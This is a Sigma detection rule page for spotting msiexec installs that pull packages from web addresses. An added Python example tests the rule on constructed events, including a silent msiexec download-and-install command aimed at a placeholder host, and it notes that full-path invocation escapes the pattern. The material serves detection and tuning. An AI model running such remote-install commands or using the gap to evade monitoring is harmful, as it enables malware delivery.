MsiExec Web Install
Detects suspicious msiexec process starts with web addresses as parameter
Sigma rule
title: MsiExec Web Install
id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
related:
    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
      type: similar
status: test
description: Detects suspicious msiexec process starts with web addresses as parameter
references:
    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
author: Florian Roth (Nextron Systems)
date: 2018-02-09
modified: 2022-01-07
tags:
    - attack.defense-evasion
    - attack.t1218.007
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' msiexec'
            - '://'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: medium
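The selection above is a `contains|all` match on `CommandLine`, so the rule fires only when both substrings (`' msiexec'`, with a leading space, and `'://'`) appear in the logged command line. The following is an added example, not part of the Sigma project or this rule, that applies that logic to a few constructed process-creation events (hostnames use the reserved `.invalid` TLD). It assumes Sigma's default case-insensitive string matching. The third event shows a coverage caveat worth knowing as a defender: when the logged command line carries the full path (`...\msiexec.exe`), `msiexec` is preceded by a backslash rather than a space, so the `' msiexec'` pattern does not match even though a URL is present.

```python
"""Added example: evaluate the rule's selection against sample events.
This is not the Sigma project's code; it mirrors the contains|all semantics
of the rule as written, with case-insensitive matching."""

# Patterns copied verbatim from the rule's CommandLine|contains|all list.
PATTERNS = [" msiexec", "://"]


def matches(event: dict) -> bool:
    """Return True when every pattern is a substring of the event's
    CommandLine (Sigma contains|all, case-insensitive)."""
    cmd = event.get("CommandLine", "").lower()
    return all(p.lower() in cmd for p in PATTERNS)


# Constructed sample process_creation events (not real telemetry).
SAMPLE_EVENTS = [
    # Relative invocation via cmd: ' msiexec' and '://' both present -> match
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c msiexec /q /i http://updates.example.invalid/pkg.msi"},
    # Local package, no URL -> no match
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i C:\Temp\app.msi /qn'},
    # Full path with a URL: '://' present, but 'msiexec' is preceded by a
    # backslash, not a space, so ' msiexec' is absent -> no match (rule gap)
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i https://pkg.example.invalid/app.msi /qn'},
]


def evaluate(events):
    """Return one boolean per event: whether the selection matched."""
    return [matches(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{'MATCH ' if hit else 'no hit'}  {event['CommandLine']}")
```

Running the block prints `MATCH` for the first event only. The third case is why a practitioner tuning this rule in a SIEM usually pairs it with the `Image` field (ending in `\msiexec.exe`) or a broader `msiexec` substring rather than relying on the leading-space variant alone.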
References
Related rules
- Curl Download And Execute Combination
- Download from Suspicious Dyndns Hosts
- File Download Via Nscurl - MacOS
- File Download Via Windows Defender MpCmpRun.EXE
- Greenbug Espionage Group Indicators